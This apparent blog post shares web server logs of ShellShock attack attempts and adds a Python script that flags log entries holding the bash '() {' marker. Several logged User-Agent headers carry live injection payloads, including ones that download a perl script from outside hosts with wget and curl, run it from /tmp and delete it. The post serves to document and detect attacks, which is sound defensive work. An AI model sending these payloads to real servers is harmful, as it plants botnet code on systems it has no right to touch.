A test post exposing some ShellShock attack logs. Some of the IP addresses are masked.
An example of a scan that arrived after ShellShock was disclosed
209.126.230.72 - - [25/Sep/2014:10:21:03 +0900] "GET / HTTP/1.0" 200 141 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
Vulnerability-check bot
118.192.48.* - - [28/Sep/2014:01:08:26 +0900] "GET /cgi-bin/count.cgi HTTP/1.1" 403 219 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo 9n4qIed2aL`;"
118.192.48.* - - [28/Sep/2014:01:08:26 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 403 218 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo TtpE69SzyV`;"
118.192.48.* - - [28/Sep/2014:01:08:26 +0900] "GET /cgi-bin/help.cgi HTTP/1.1" 403 218 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo fvOz94LqIm`;"
118.192.48.* - - [28/Sep/2014:01:08:27 +0900] "GET /cgi-bin/index.cgi HTTP/1.1" 403 219 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo 0RzvleB3im`;
Probably a probe to see whether the attack would work?
Planting a botnet
173.45.100.** - - [29/Sep/2014:10:18:18 +0900] "GET /cgi-bin/ HTTP/1.1" 403 210 "-" "-"
173.45.100.** - - [29/Sep/2014:10:18:21 +0900] "GET /cgi-bin/hi HTTP/1.0" 403 212 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.***/ji;curl -O /tmp/ji http://213.5.67.***/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
142.4.215.*** - - [01/Oct/2014:15:59:01 +0900] "GET /cgi-bin/ HTTP/1.1" 403 210 "-" "-"
142.4.215.*** - - [01/Oct/2014:15:59:07 +0900] "GET /cgi-bin/hi HTTP/1.0" 403 212 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.**/ji;curl -O /tmp/ji http://89.33.193.**/ji ; perl /tmp/ji;rm -rf /tmp/ji\"
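
One way to pull entries like the ones above out of an Apache combined-format access log, as an added example that is not part of the original post: it flags any request, Referer or User-Agent value containing the "() {" function-definition marker that appears in every payload shown here, and falls back to the raw line for truncated entries. The sample lines (documentation-range IPs, harmless echo payloads) are constructed, and the names scan, LINE_RE and SHELLSHOCK_RE are this example's own.

```python
import re

# Apache "combined" format; quoted fields may contain backslash-escaped quotes (\").
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) (\S+) '
    + QUOTED + ' ' + QUOTED + r'\s*$'
)
# The bash function-definition marker "() {" (optional whitespace), anywhere in a value.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

def scan(lines):
    """Return one finding per log line that carries a Shellshock-style value."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            # Truncated or malformed entry: fall back to scanning the raw line.
            if SHELLSHOCK_RE.search(line):
                findings.append({"host": line.split(" ", 1)[0],
                                 "status": None, "fields": ["raw-line"]})
            continue
        host, _ts, request, status, _size, referer, agent = m.groups()
        fields = (("request", request), ("referer", referer), ("user-agent", agent))
        hits = [name for name, value in fields if SHELLSHOCK_RE.search(value)]
        if hits:
            findings.append({"host": host, "status": int(status), "fields": hits})
    return findings

# Constructed sample lines, not taken from a real log.
SAMPLE = [
    '192.0.2.10 - - [25/Sep/2014:10:21:03 +0900] "GET / HTTP/1.0" 200 141 '
    '"() { :; }; echo constructed-a" "example-scanner"',
    '198.51.100.7 - - [28/Sep/2014:01:08:26 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '403 218 "http://example.com" "() { :; }; echo constructed-b"',
    '203.0.113.5 - - [29/Sep/2014:10:18:21 +0900] "GET /cgi-bin/hi HTTP/1.0" 403 212 '
    '"-" "() { :;}; /bin/bash -c \\"echo constructed-c\\""',
    '203.0.113.9 - - [29/Sep/2014:10:19:00 +0900] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    # Entry cut off before the closing quote, like the last lines in the post.
    '203.0.113.6 - - [01/Oct/2014:15:59:07 +0900] "GET /cgi-bin/hi HTTP/1.0" 403 212 '
    '"-" "() { :;}; echo constructed-d',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["host"], f["status"], ",".join(f["fields"]))
```

The status column is worth keeping in the output: a 403 means the server refused the request, while a 200 on a CGI path with a flagged header calls for checking whether the handler runs under a vulnerable bash.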